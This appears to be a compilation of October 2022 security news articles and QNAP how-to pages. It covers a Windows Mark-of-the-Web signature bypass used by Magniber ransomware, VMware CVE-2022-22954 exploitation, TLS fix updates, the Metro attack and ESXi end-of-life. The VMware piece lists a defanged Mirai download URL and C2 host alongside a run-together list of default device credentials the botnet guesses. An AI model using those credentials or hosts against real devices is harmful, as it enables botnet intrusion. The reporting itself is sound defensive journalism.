Exploited Windows zero-day lets JavaScript files bypass security warnings

An update was added to the end of the article explaining that any Authenticode-signed file, including executables, can be modified to bypass warnings.

A new Windows zero-day allows threat actors to use malicious stand-alone JavaScript files to bypass Mark-of-the-Web security warnings. Threat actors are already seen using the zero-day bug in ransomware attacks.

Windows includes a security feature called Mark-of-the-Web (MoTW) that flags a file as having been downloaded from the Internet and, therefore, should be treated with caution as it could be malicious.

The MoTW flag is added to a downloaded file or email attachment as a special Alternate Data Stream called ‘Zone.Identifier,’ which can be viewed using the ‘dir /R’ command and opened directly in Notepad, as shown below.

The Mark-of-the-Web alternate data stream
The Mark-of-the-Web alternate data stream
Source: BleepingComputer

This ‘Zone.Identifier’ alternate data stream includes what URL security zone the file is from (three equals the Internet), the referrer, and the URL to the file.

When a user attempts to open a file with the Mark-of-the-Web flag, Windows will display a warning that the file should be treated with caution.

“While files from the Internet can be useful, this file type can potentially harm your computer. If you do not trust the source, do not open this software,” reads the warning from Windows.

Windows security warning when opening files with MoTW flags
Windows security warning when opening files with MoTW flags
Source: BleepingComputer

Microsoft Office also utilizes the MoTW flag to determine if the file should be opened in Protected View, causing macros to be disabled.

Windows MoTW bypass zero-day flaw

The HP threat intelligence team recently reported that threat actors are infecting devices with Magniber ransomware using JavaScript files.

To be clear, we are not talking about JavaScript files commonly used on almost all websites, but .JS files distributed by threat actors as attachments or downloads that can run outside of a web browser.

The JavaScript files seen distributed by the Magniber threat actors are digitally signed using an embedded base64 encoded signature block as described in this Microsoft support article.

JavaScript file used to install the Magniber Ransomware
JavaScript file used to install the Magniber Ransomware
Source: BleepingComputer​​
https://560aeee9b5a62b70c68af2cae4baaec2.safeframe.googlesyndication.com/safeframe/1-0-38/html/container.html?upapi=true

AD

After being analyzed by Will Dormann, a senior vulnerability analyst at ANALYGENCE, he discovered that the attackers signed these files with a malformed key.

Malformed signature in malicious JavaScript file
Malformed signature in malicious JavaScript file
Source: BleepingComputer

When signed in this manner, even though the JS file was downloaded from the Internet and received a MoTW flag, Microsoft would not display the security warning, and the script would automatically execute to install the Magniber ransomware.

Dormann further tested the use of this malformed signature in JavaScript files and was able to create proof-of-concept JavaScript files that would bypass the MoTW warning.

Both of these JavaScript (.JS) files were shared with BleepingComputer, and as you can see below, they both received a Mark-of-the-Web, as indicated by the red boxes, when downloaded from a website.

Mark-of-the-Web on Dormann's PoC exploits
Mark-of-the-Web on Dormann’s PoC exploits
Source: BleepingComputer

The difference between the two files is that one is signed using the same malformed key from the Magniber files, and the other contains no signature at all. 

Dormann's PoC Exploits
Dormann’s PoC Exploits
Source: BleepingComputer

When the unsigned file is opened in Windows 10, a MoTW security warning is properly displayed.

However, when double-clicking the ‘calc-othersig.js,’ which is signed with a malformed key, Windows does not display a security warning and simply executes the JavaSript code, as demonstrated below.

Demonstration of the Windows zero-day bypassing security warnings
Demonstration of the Windows zero-day bypassing security warnings
Source: BleepingComputer

Using this technique, threat actors can bypass the normal security warnings shown when opening downloaded JS files and automatically execute the script.

BleepingComputer was able to reproduce the bug in Windows 10. However, for Windows 11, the bug would only trigger when running the JS file directly from an archive.

Dormann told BleepingComputer that he believes this bug was first introduced with the release of  Windows 10, as a fully patched Windows 8.1 device displays the MoTW security warning as expected.

https://platform.twitter.com/embed/Tweet.html?creatorScreenName=BleepinComputer&dnt=false&embedId=twitter-widget-0&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiLCJ0ZXJyYS5jb20uYnIiLCJ3d3cubGlua3RyLmVlIiwid3d3LnRyLmVlIiwid3d3LnRlcnJhLmNvbS5iciJdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdGltZWxpbmVfMTIwMzQiOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9lZGl0X2JhY2tlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3JlZnNyY19zZXNzaW9uIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19jaGluX3BpbGxzXzE0NzQxIjp7ImJ1Y2tldCI6ImNvbG9yX2ljb25zIiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9yZXN1bHRfbWlncmF0aW9uXzEzOTc5Ijp7ImJ1Y2tldCI6InR3ZWV0X3Jlc3VsdCIsInZlcnNpb24iOm51bGx9LCJ0Zndfc2Vuc2l0aXZlX21lZGlhX2ludGVyc3RpdGlhbF8xMzk2MyI6eyJidWNrZXQiOiJpbnRlcnN0aXRpYWwiLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2V4cGVyaW1lbnRzX2Nvb2tpZV9leHBpcmF0aW9uIjp7ImJ1Y2tldCI6MTIwOTYwMCwidmVyc2lvbiI6bnVsbH0sInRmd19kdXBsaWNhdGVfc2NyaWJlc190b19zZXR0aW5ncyI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdmlkZW9faGxzX2R5bmFtaWNfbWFuaWZlc3RzXzE1MDgyIjp7ImJ1Y2tldCI6InRydWVfYml0cmF0ZSIsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9mcm9udGVuZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9fQ%3D%3D&frame=false&hideCard=false&hideThread=false&id=1583055972280324097&lang=en&origin=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fexploited-windows-zero-day-lets-javascript-files-bypass-security-warnings%2F&sessionId=ad0d187be79e9f0d5b7b04498fef77964be23c7f&siteScreenName=BleepinComputer&theme=light&widgetsVersion=1c23387b1f70c%3A1664388199485&width=550px

According to Dormann, the bug stems from Windows 10’s new ‘Check apps and files’ SmartScreen feature under Windows Security > App & Browser Control > Reputation-based protection settings.

“This issue is in the new-as-of-Win10 SmartScreen feature.  And disabling “Check apps and files” reverts Windows to the legacy behavior, where MotW prompts are unrelated to Authenticode signatures,” Dormann told BleepingComputer.

https://560aeee9b5a62b70c68af2cae4baaec2.safeframe.googlesyndication.com/safeframe/1-0-38/html/container.html?upapi=true

AD

“So that whole setting is unfortunately currently a tradeoff.  On one hand, it does scan for baddies that are downloaded.”

“On the other, baddies that take advantage of this bug can get a LESS-SECURE behavior from Windows compared to when the feature is disabled.”

The zero-day vulnerability is particularly concerning as we know threat actors are actively exploiting it in ransomware attacks.

Dormann shared the proof-of-concept with Microsoft, who said they could not reproduce the MoTW security warning bypass.

However, Microsoft told BleepingComputer that they are aware of the reported issue and are investigating it.

Update 10/22/22

After the publication of this article, Dormann told BleepingComputer that threat actors could modify any Authenticode-signed file, including executables (.EXE), to bypass the MoTW security warnings.

To do this, Dormann says that a signed executable can be modified using a hex editor to change some of the bytes in the signature portion of the file and thus corrupt the signature.

https://platform.twitter.com/embed/Tweet.html?creatorScreenName=BleepinComputer&dnt=false&embedId=twitter-widget-1&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiLCJ0ZXJyYS5jb20uYnIiLCJ3d3cubGlua3RyLmVlIiwid3d3LnRyLmVlIiwid3d3LnRlcnJhLmNvbS5iciJdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdGltZWxpbmVfMTIwMzQiOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9lZGl0X2JhY2tlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3JlZnNyY19zZXNzaW9uIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19jaGluX3BpbGxzXzE0NzQxIjp7ImJ1Y2tldCI6ImNvbG9yX2ljb25zIiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9yZXN1bHRfbWlncmF0aW9uXzEzOTc5Ijp7ImJ1Y2tldCI6InR3ZWV0X3Jlc3VsdCIsInZlcnNpb24iOm51bGx9LCJ0Zndfc2Vuc2l0aXZlX21lZGlhX2ludGVyc3RpdGlhbF8xMzk2MyI6eyJidWNrZXQiOiJpbnRlcnN0aXRpYWwiLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2V4cGVyaW1lbnRzX2Nvb2tpZV9leHBpcmF0aW9uIjp7ImJ1Y2tldCI6MTIwOTYwMCwidmVyc2lvbiI6bnVsbH0sInRmd19kdXBsaWNhdGVfc2NyaWJlc190b19zZXR0aW5ncyI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdmlkZW9faGxzX2R5bmFtaWNfbWFuaWZlc3RzXzE1MDgyIjp7ImJ1Y2tldCI6InRydWVfYml0cmF0ZSIsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9mcm9udGVuZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9fQ%3D%3D&frame=false&hideCard=false&hideThread=true&id=1582493426494636032&lang=en&origin=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fexploited-windows-zero-day-lets-javascript-files-bypass-security-warnings%2F&sessionId=ad0d187be79e9f0d5b7b04498fef77964be23c7f&siteScreenName=BleepinComputer&theme=light&widgetsVersion=1c23387b1f70c%3A1664388199485&width=550px

Once the signature is corrupted, Windows will not check the file using SmartScreen, as if a MoTW flag was not present, and allow it to run.

“Files that have a MotW are treated as if there were no MotW if the signature is corrupt. What real-world difference that makes depends on what type of file it is,” explained Dormann.

Related Articles:

Magniber ransomware now infects Windows users via JavaScript files

Microsoft finally releases tabbed File Explorer for Windows 11

Windows Mark of the Web bypass zero-day gets unofficial patch

Microsoft: New Prestige ransomware targets orgs in Ukraine, Poland

Microsoft Exchange servers hacked to deploy LockBit ransomware

Source :
https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/

VMware bug with 9.8 severity rating exploited to install witch’s brew of malware

If you haven’t patched CVE-2022-22954 yet, now would be an excellent time to do so.


Hackers have been exploiting a now-patched vulnerability in VMware Workspace ONE Access in campaigns to install various ransomware and cryptocurrency miners, a researcher at security firm Fortinet said on Thursday.

FURTHER READING

2 vulnerabilities with 9.8 severity ratings are under exploit. A 3rd loomsCVE-2022-22954 is a remote code execution vulnerability in VMware Workspace ONE Access that carries a severity rating of 9.8 out of a possible 10. VMware disclosed and patched the vulnerability on April 6. Within 48 hours, hackers reverse-engineered the update and developed a working exploit that they then used to compromise servers that had yet to install the fix. VMware Workspace ONE access ​​helps administrators configure a suite of apps employees need in their work environments.

In August, researchers at Fortiguard Labs saw a sudden spike in exploit attempts and a major shift in tactics. Whereas before the hackers installed payloads that harvested passwords and collected other data, the new surge brought something else—specifically, ransomware known as RAR1ransom, a cryptocurrency miner known as GuardMiner, and Mirai, software that corrals Linux devices into a massive botnet for use in distributed denial-of-service attacks.

EnlargeFortiGuard

“Although the critical vulnerability CVE-2022-22954 is already patched in April, there are still multiple malware campaigns trying to exploit it,” Fortiguard Labs researcher Cara Lin wrote. Attackers, she added, were using it to inject a payload and achieve remote code execution on servers running the product.

The Mirai sample Lin saw getting installed was downloaded from http[:]//107[.]189[.]8[.]21/pedalcheta/cutie[.]x86_64 and relied on a command and control server at “cnc[.]goodpackets[.]cc. Besides delivering junk traffic used in DDoSes, the sample also attempted to infect other devices by guessing the administrative password they used. After decoding strings in the code, Lin found the following list of credentials the malware used:

hikvision1234win1dowsS2fGqNFs
roottsgoingonnewsheen12345
defaultsolokeyneworange88888888guest
binuserneworangsystem
059AnkJtelnetadmintlJwpbo6iwkb
1413881234562015060200000000
adaptec20080826vstarcam2015v2mprt
Administrator1001chinvhd1206support
NULLxc3511QwestM0dem7ujMko0admin
bbsd-clientvizxvfidel123dvr2580222
par0thg2x0samsungt0talc0ntr0l4!
cablecomhunt5759epicrouterzlxx
pointofsalenflectionadmin@mimifixmhdipc
icatch99passworddaemonnetopia
3comDOCSIS_APPhagpolm1klv123
OxhlwSG8

In what appears to be a separate campaign, attackers also exploited CVE-2022-22954 to download a payload from 67[.]205[.]145[.]142. The payload included seven files:

  • phpupdate.exe: Xmrig Monero mining software
  • config.json: Configuration file for mining pools
  • networkmanager.exe: Executable used to scan and spread infection
  • phpguard.exe: Executable used for guardian Xmrig miner to keep running
  • init.ps1: Script file itself to sustain persistence via creating scheduled task
  • clean.bat: Script file to remove other cryptominers on the compromised host
  • encrypt.exe: RAR1 ransomware

In the event RAR1ransom has never been installed before, the payload would first run the encrypt.exe executable file. The file drops the legitimate WinRAR data compression executable in a temporary Windows folder. The ransomware then uses WinRAR to compress user data into password-protected files.

The payload would then start the GuardMiner attack. GuardMiner is a cross-platform mining Trojan for the Monero currency. It has been active since 2020.

The attacks underscore the importance of installing security updates in a timely manner. Anyone who has yet to install VMware’s April 6 patch should do so at once.

Source :
https://arstechnica.com/information-technology/2022/10/ransomware-crypto-miner-and-botnet-malware-installed-using-patched-vmware-bug/

SSL/TLS connection issue fix: out-of-band update status and affected applications (Oct. 21, 2022)

[German]As of October 17, 2022, Microsoft has released several unscheduled updates for Windows. These updates fix a connection problem that can occur with SSL and TLS connections. Affected by this problem are probably all Windows client and server. Below I have listed all available updates and also give some hints where problems occur without these updates.


Advertising


Out-of-band updates with TLS fix

Microsoft made a mistake with the last updates for Windows (preview updates from September, security updates from October). As a result, various problems with SSL and TLS connections can occur. Microsoft has therefore released some : out-of-band updates on October 17, 2022 to fix the problem.

I had reportedthat  in the blog post Out-of-band updates for Windows fixes SSL-/TLS connection issues (also with Citrix) – October 17, 2022. However, Microsoft had not linked all the updates in its status pages (thanks to EP for pointing out the links), so that I could complete the list of updates for the affected Windows versions below:

The out-of-band updates KB5020439 and KB5020440 were added on October 18th.  These updates are only available for download in the Microsoft Update Catalog and have to be installed manually (just search for the KB numbers). Details about these updates can be found in the linked KB articles.

So only Windows 11 22H2 is missing the corresponding fix update. EP writes here that this fix will be added with the upcoming update KB5018496. This is currently released in the Windows Insider program as a pre-release version in the Release Preview channel (see).

Problems fixed with the updates

People have asked in comments which applications are actually affected by the TLS bugs. I don’t have a complete list, but would like to give some hints below as to what has come to my attention as a fix. Thanks to blog readers for the pointers.


Advertising


Citrix connectivity issue

With the October 2022 updates, administrators found that Citrix clients could no longer communicate with Citrix netscalers. I had reported on this in the blog postCitrix connections broken after Windows update KB5018410 (October 2022) (TLS problem). Affected people who installed the above updates reported that this fixed the connection problem.

KB5020387 fixes TLS 1.3 problem on Windows 10

On Windows, there was also the issue that there TLS 1.3 implementation was buggy on Windows 10 (it only works in Windows 11). I had raised a conflict case in the blog post Bug: Outlook no longer connects to the mail server (October 2022). Microsoft suggested disabling TLS 1.3 via registry intervention as a workaround. In this comment, someone suggests uninstalling updates KB5018410 (Windows 10) and KB5018427 (Windows 11).

Blog reader Harvester asked here, whether TLS 1.3 works with Windows 10 after installing the special updates, and then followed up with the results of his own tests.

Self-reply after tests : Schannel is working properly after having applied KB5020387 on a LTSC 2021 IoT Enterprise image (21H2), where Schannel was previously broken (on build 19044.2130, from October 11 2022)

We initially guessed that the IoT Enterprise SKU wasn’t supporting TLS 1.3, but now we confirmed that we hit the bug mentioned in the post.

“Fun” fact : while it as initially reported that TLS 1.3 was available starting from Windows 10 1903, the Schannel documentation was changed recently, and now state that only Windows 11 and Server 2022 support TLS 1.3: Protocols in TLS/SSL (Schannel SSP)

VPN and WebEx Meetings App

Within this German comment blog reader Marten reported, that the WebEx Meetings App could no longer connect to the WebEx Server (OnPrem) via VPN. The issue has been fixed via update.

Quest Migration Manager for Exchange

On Twitter, enno0815de has sent the following tweet, which refers to my message about the out-of-band updates with TLS fix. It says, anyone planning a domain migration using Quest Migration Manager for Exchange should also install the updates. Otherwise, the account will be locked out for the migration.


In a follow up tweet he adds: By some circumstance the Atelia class (Quest component) is deleted from the registry. Without the TLS fix, you lock the user out of AD completely.

Similar article:
Windows 10: Beware of a possible TLS disaster on October 2022 patchday
Citrix connections broken after Windows update KB5018410 (October 2022) (TLS problem)
Bug: Outlook no longer connects to the mail server (October 2022)
Out-of-band updates for Windows fixes SSL-/TLS connection issues (also with Citrix) – October 17, 2022

Source :
https://borncity.com/win/2022/10/22/fix-des-ssl-tls-verbindungsproblems-stand-der-sonderupdates-und-betroffene-anwendungen-21-10-2022/

Confirmed: Metro Group victim of cyber attack

[German]Since Monday, October 17, 2022, many Metro stores worldwide have been struggling with severe IT problems. I had already suspected a cyber attack on the Metro Group in a post and I had reports from Austria, from France as well as comments from German Metro customers as well as employees. However, a cyber attack remained unconfirmed so far. Now Metro AG has confirmed such an attack to heise – and on its website.


Advertising


Metro Group with IT problems

I had already reported about the IT problems at Metro Group in the blog post Cyber attack on Metro AG or just a IT break down? Austria, France, German (and more countries?) affected. Since Monday, October 17, 2022, Metro wholesales stores have been struggling with massive IT problems. No invoices or daily passes could be issued and online orders had also disappeared, Metro customers reported. A blog reader had provided me with the following photo of a Metro notice board.

IT-Störung bei Metro
Notification about IT disruption at a Metro wholesale store

The suspicion of a cyber attack has not been confirmed by company spokespersons till today (October 21, 2022). But I have had reports from German blog readers, reporting IT issues since days and some people told me, it’s a cyber attack as a root cause.

Not only Austria and France are affected, but Metro AG worldwide. In Germany, too, the same problem has existed since last Monday. No more stock or prices can be updated or checked in the store. The checkout system is still working but also sluggishly, resulting in long lines. If you want to reserve something digitally, that doesn’t work either.

One reader noted that from what he observed, the IT problems have been going on since Friday afternoon (October 14, 2022). A reader informed me on Facebook that their email systems had delivered a 442 connection Failed-Error when communicating with the Metro mail system last Monday. By the afternoon of October 19, 2022, communication with the Metro Group email system was working again – so something is happening.


Advertising


Metro confirms cyber attack

First a speaker from Metro AG confired to German IT magazine heise a cyber attack on it’s IT systems. After searching the Metro AG site today, I finally found the following statement. It says (translated in English):

Metro cyber attack confirmation
Metro cyber attack confirmation (addenum: here is an English version)

T-Security Incident at METRO

METRO/MAKRO is currently experiencing a partial IT infrastructure outage for several technical services. METRO’s IT team, together with external experts, immediately launched a thorough investigation to determine the cause of the service disruption. The latest results of the analysis confirm a cyber attack on METRO systems as the cause of the IT infrastructure outage. METRO AG has informed all relevant authorities about the incident and will of course cooperate with them in every possible way.

During the operation of METRO stores and the regular availability of services, disruptions and delays may occur. The teams in the stores have quickly set up offline systems to process payments. Online orders via the web app and online store are being processed, but there may be individual delays here as well.

We will continue to analyze and monitor the situation intensively and provide updates if necessary.
METRO sincerely apologizes for any inconvenience this incident may cause to customers and business partners.

So they confirmed just a cyber attack, but stay tight lipped about the details. No information, whether it’s a ransomware infection nor about a possible attack vector.

Metro AG is a listed group of wholesale companies (for purchases in the gastronomy sector). Headquartered in Düsseldorf, the group employs more than 95,000 people in 681 stores worldwide, most of them in Germany. In Germany, the company mainly operates the Metro wholesale stores. Sales are 24.8 billion euros (2020).

Similar articles:
Cyber attack on Metro AG or just a IT break down? Austria, France, German (and more countries?) affected
Ransomware Attack on electronic retail markets of Media Markt/Saturn
Media Markt/Saturn: Ransomware attack by hive gang, $240 million US ransom demand

Source :
https://borncity.com/win/2022/10/21/metro-gruppe-doch-opfer-eines-cyberangriffs/

Over 45,000 VMware ESXi servers just reached end-of-life

Over 45,000 VMware ESXi servers inventoried by Lansweeper just reached end-of-life (EOL), with VMware no longer providing software and security updates unless companies purchase an extended support contract.

Lansweeper develops asset management and discovery software that allows customers to track what hardware and software they are running on their network.

As of October 15, 2022, VMware ESXi 6.5 and VMware ESXi 6.7 reached end-of-life and will only receive technical support but no security updates, putting the software at risk of vulnerabilities.

The company analyzed data from 6,000 customers and found 79,000 installed VMware ESXi servers.

Of those servers, 36.5% (28,835) run version 6.7.0, released in April 2018, and 21.3% (16,830) are on version 6.5.0, released in November 2016. In total, there are 45,654 VMware ESXi servers reaching End of Life as of today

The findings of Lansweeper are alarming because apart from the 57% that enter a period of elevated risk, there are also another 15.8% installations that run even older versions, ranging from 3.5.0 to 5.5.0, which reached EOL quite some time ago.

In summary, right now, only about one out of four ESXi servers (26.4%) inventoried by Lansweeper are still supported and will continue to receive regular security updates until April 02, 2025.

However, in reality, the number of VMware servers reaching EOL today, is likely far greater, as this report is based only on Lansweeper’s customers.

VMWare versions detected on net scans
VMWare versions detected on net scans (Lansweeper)

The technical guidance for ESXi 6.5 and 6.7 will carry on until November 15, 2023, but this concerns implementation issues, not including security risk mitigation.

The only way to ensure you can continue to use older versions securely is to apply for the two-year extended support, which needs to be purchased separately. However, this does not include updates for third-party software packages.

For more details about EOL dates on all VMware software products, check out this webpage.

What does this mean?

When a software product reaches the end-of-life date, it stops receiving regular security updates. This means that admins should have already planned ahead and upgraded all deployments to a newer release.

While it’s not unlikely that VMware will still offer some critical security patches for these older versions, it’s not guaranteed and certainly won’t release patches for all new vulnerabilities that are discovered.

Once an unsupported ESXi server has carried on for long enough without patches, it will have accumulated so many security vulnerabilities that attackers would have multiple ways to breach it.

Due to ESXi hosting virtual machines, attacking the server can potentially cause severe and wide-scale disruption to business operations, which is why ransomware gangs are so focused on targeting it.

This year, ESXi VMs were targeted by the likes of Black BastaRedAlertGwisinLockerHive, and the Cheers ransomware gangs.

More recently, Mandiant discovered that hackers found a new method to establish persistence on VMware ESXi hypervisors that lets them control the server and hosted VMs without being detected.

All that said, ESXi already enjoys ample attention from threat actors, so running outdated and vulnerable versions of the software would no doubt be a terrible idea.

Related Articles:

VMware: 70% drop in Linux ESXi VM performance with Retbleed fixes

Microsoft October 2022 Patch Tuesday fixes zero-day used in attacks, 84 flaws

Microsoft adds new RSS feed for security update notifications

VMware vCenter Server bug disclosed last year still not patched

Windows 11 KB5018427 update released with 30 bug fixes, improvements

Source :
https://www.bleepingcomputer.com/news/security/over-45-000-vmware-esxi-servers-just-reached-end-of-life/

Set Port Trunking on your QNAP NAS to increase the bandwidth via 802.3ad protocol

Port Trunking, also known as LACP (Link Aggregation Control Protocol), allows you to combine multiple LAN interfaces for increased bandwidth and load balancing for multiple clients. It also provides failover capabilities to maintain network connectivity if a network port fails.

  • 802.3ad (Dynamic Link Aggregation) is the No.5 mode according to the IEEE 802.3ad specification. It uses a complex algorithm to aggregate adapters by speed and duplex settings to provide load balancing and fault tolerance but requires a switch that supports IEEE 802.3ad with LACP mode properly configured.
QNAP

Note: Your switch must support 802.3ad.
Note: A NAS with multiple LAN ports is required.

Follow these steps to set up your NAS.

  1. Log into the NAS as an administrator. Go to “Main Menu” > “Network & Virtual Switch” > “Interfaces”. Click “Port Trunking”.
    QNAP
    QNAP
  2. Click “Add” from the pop-up window.
    QNAP
  3. Select the network interfaces to use and select 802.3ad for the Port Trunking Mode.
    QNAP
  4. Click the settings button beside 802.3ad.
    QNAP
  5. Select a HASH policy for 802.3ad:
    The default setting is “layer 2 (MAC)“. This is compatible with every switch but only offers load balancing by MAC address. We recommend using “Layer 2+3 (MAC+IP)” for greater performance but you will need to check that your switch supports it.
    QNAP
  6. Click “Apply” to finish.
    QNAP

Test Results:

The test results of before and after Port Trunking is as follows.

  1. A Gigabit Ethernet Network
    1. One user downloading a large video file from the NAS:
      QNAP
    2. One user uploading a large video file to the NAS:
      QNAP
    3. Two users downloading a large video file from the NAS at the same time:
      QNAP
      QNAP
      The throughput of the NAS reaches 108~110 MB/s (downloading):
      QNAP
    4. Two users upload a large video file to the NAS at the same time:
      QNAP
      QNAP
      The throughput of NAS reaches 102~104 MB/s (uploading):
      QNAP

  2. Aggregating two Gigabit Ethernet Networks on the NAS
    1. One user downloads a large video file from the NAS:
      QNAP
    2. One user uploads a large video file to the NAS:
      QNAP
    3. Two users download a large video file from the NAS at the same time:
      QNAP
      QNAP
      The throughput of NAS reaches 210~223 MB/s (downloading):
      QNAP
    4. Two users upload a large video file to the NAS at the same time:
      QNAP
      QNAP
      The throughput of NAS reaches 200~210 MB/s (uploading):
      QNAP

As displayed by the test results, Port Trunking can increase bandwidth on a QNAP NAS . But please note the following:

  1. Port Trunking cannot break the speed limit of a single Ethernet device, but it offers a sufficient amount of bandwidth for multiple users connecting at the same time. For example, if two 1Gb NICs are used for Port Trunking, the aggregated network bandwidth will be increased to 2Gb, but the network speed will remain 1Gb.
  2. Available system resources and the maximum read/write speeds of the storage devices on the NAS will greatly influence the overall bandwidth.

    Source :
    https://www.qnap.com/en/how-to/tutorial/article/set-port-trunking-on-your-qnap-nas-to-increase-the-bandwidth-via-802-3ad-protocol

FAQs about self-encrypting drives (SEDs)

Last modified date: 2022-10-05
Applicable Products
QTS
QuTS hero
SED Usage
Can I use different types of SEDs to create a SED secure storage pool?
Yes, you can use different types of SEDs in the same SED secure storage pool.

Can I use SEDs in a normal storage pool?
Yes, normal storage pools can contain SEDs. However, the SEDs would function as regular disks without self-encryption.

When creating a normal storage pool, make sure the option Create SED secure storage pool is deselected.

If I use SEDs in a normal storage pool, will the pool be locked after the NAS restarts?
No, the system does not lock normal storage pools when the NAS restarts. SEDs in a normal storage pool function as regular disks without self-encryption.

Only SED secure storage pools are locked after the NAS restarts (unless the setting Auto unlock on startup is enabled).

SED Status
Why is my SED’s disk status “Unlocked” even though I never activated its self-encrypting function?
In QTS versions earlier than 5.0.1 and QuTS hero versions earlier than h5.0.1, only SEDs of the type TCG Opal are supported.

Starting from QTS 5.0.1 and QuTS hero h5.0.1, TCG Enterprise SEDs are also supported.

If you used any TCG Enterprise SEDs to create a normal storage pool when your NAS was running QTS versions earlier than 5.0.1 or QuTS hero versions earlier than h5.0.1, and then later upgraded your operating system to QTS 5.0.1 (or later) or QuTS hero h5.0.1 (or later), the NAS will now indicate their disk status as “Unlocked”. This does not affect the status or performance of the storage pool, and the SEDs will continue to function as regular disks.

If a TCG Enterprise SED has never been used in a storage pool, and the disk status has changed to “Unlocked” after you upgraded the NAS operating system to QTS 5.0.1 (or later) or QuTS hero h5.0.1 (or later), you can use the SED Erase function to reset the disk to factory default, and then activate self-encryption on the disk by setting an encryption password.

Resetting to Factory Default
What can I do if I cannot find the PSID on my SED?
SEDs usually have a PSID (physical secure ID) labeled on the disk. If you cannot find the PSID on the disk, please contact the disk manufacturer for assistance.

Why doesn’t the PSID work when I try to reset my SED?
If you are unable to reset your SED to factory default using its PSID (physical secure ID), please contact the disk manufacturer for technical assistance.

If the disk manufacturer is unable to help you reset the SED, you can still use the SED as a regular disk.

Source :
https://www.qnap.com/en/how-to/faq/article/faqs-about-self-encrypting-drives-seds

How to use self-encrypting drives (SEDs) on your QNAP NAS?


Last modified date: 2022-10-12

This tutorial introduces self-encrypting drives (SEDs) and how to utilize and manage them on your QNAP NAS.
 

Applicable ProductsDetails
NASAll QNAP NAS models
Operating systemQTS, QuTS hero

Self-Encrypting Drives (SEDs)

A self-encrypting drive (SED) is a drive with encryption hardware built into the drive controller. SEDs automatically encrypt all data as it is written to the drive and decrypt all data as it is read from the drive. Data stored on SEDs are always fully encrypted by a data encryption key, which is stored on the drive’s hardware and cannot be accessed by the host operating system or unauthorized users. The encryption key can also be encrypted by a user-specified encryption password that allows the SED to be locked and unlocked.

Because encryption and decryption are handled by the drive, accessing data on SEDs does not require any extra CPU resources from the host device. Data on SEDs also become inaccessible if the SEDs are physically stolen or lost. For these reasons, SEDs are widely preferred for storing sensitive information.

You can use SEDs to create SED secure storage pools in QTS and QuTS hero, and SED secure static volumes in QTS. You can also use SEDs to create regular storage pools or volumes, but the self-encrypting function on the SEDs would remain deactivated.

Why Use SEDs?

Data storage security is an extremely important matter for many enterprises and organizations, especially when they store personal data such as credit card information and identity card numbers, or industry secrets such as product blueprints and intellectual property.

If a data leak occurs, the enterprise or organization can face serious consequences. Apart from sensitive information being exposed, a data leak can also result in customer and client damages, revenue loss, and legal penalties.

Because SEDs use hardware-based full disk encryption, both the encryption and decryption processes occur in the disk hardware. This separation from the host operating system makes hardware encryption more secure than software encryption. Moreover, unlike software encryption, hardware encryption does not require extra CPU resources. If a SED is physically stolen or lost, it becomes practically impossible to obtain intelligible information from the SED.

For these reasons, SEDs are often a specified data security requirement in bidding processes for government agencies, health care institutions, and financial and banking services.

SED Types

QNAP categorizes SED types according to the industry-standard specifications defined by the Trusted Computing Group (TCG). Supported SED types are listed in the following table.

To check the SED type of an installed SED, go to Storage & Snapshots > Storage > Disks/VJBOD and click a SED.

SED TypeSupported
TCG OpalYes
TCG EnterpriseYes, in QTS 5.0.1 (or later) and QuTS hero h5.0.1 (or later)

SED Storage Creation

You can use SEDs to create SED secure storage pools in QTS and QuTS hero, and SED secure static volumes in QTS. For details, see the corresponding QNAP operating system user guide.

ActionDetails
Create a SED secure storage pool in QTSThe latest version of the QTS User Guide is available at https://www.qnap.com/go/doc/qts/.You can find the relevant topic by searching “self-encrypting drives”.
Create a SED secure static volume in QTS
Create a SED secure storage pool in QuTS heroThe latest version of the QuTS hero User Guide is available at https://www.qnap.com/go/doc/quts-hero/.You can find the relevant topic by searching “self-encrypting drives”.

SED Management

SED Storage Pool and Static Volume Actions

To perform the following actions, go to Storage & Snapshots > Storage > Storage/Snapshots, select a SED pool or volume, click Manage, then select Actions > SED Settings.

ActionDescription
Change SED Pool PasswordChange SED Volume PasswordChange the encryption password.Warning:Remember this password. If you forget the password, the pool or volume will become inaccessible and all data will be unrecoverable.You can also enable Auto unlock on startup.This setting enables the system to automatically unlock and mount the SED pool or volume whenever the NAS starts, without requiring the user to enter the encryption passwordWarning:Enabling this setting can result in unauthorized data access if unauthorized personnel are able to physically access the NAS.Tip:In some earlier versions of QTS and QuTS hero, this setting is known as Save encryption key.
LockLock the pool or volume. All volumes/shared folders, LUNs, snapshots, and data in the pool or volume will be inaccessible until it is unlocked.
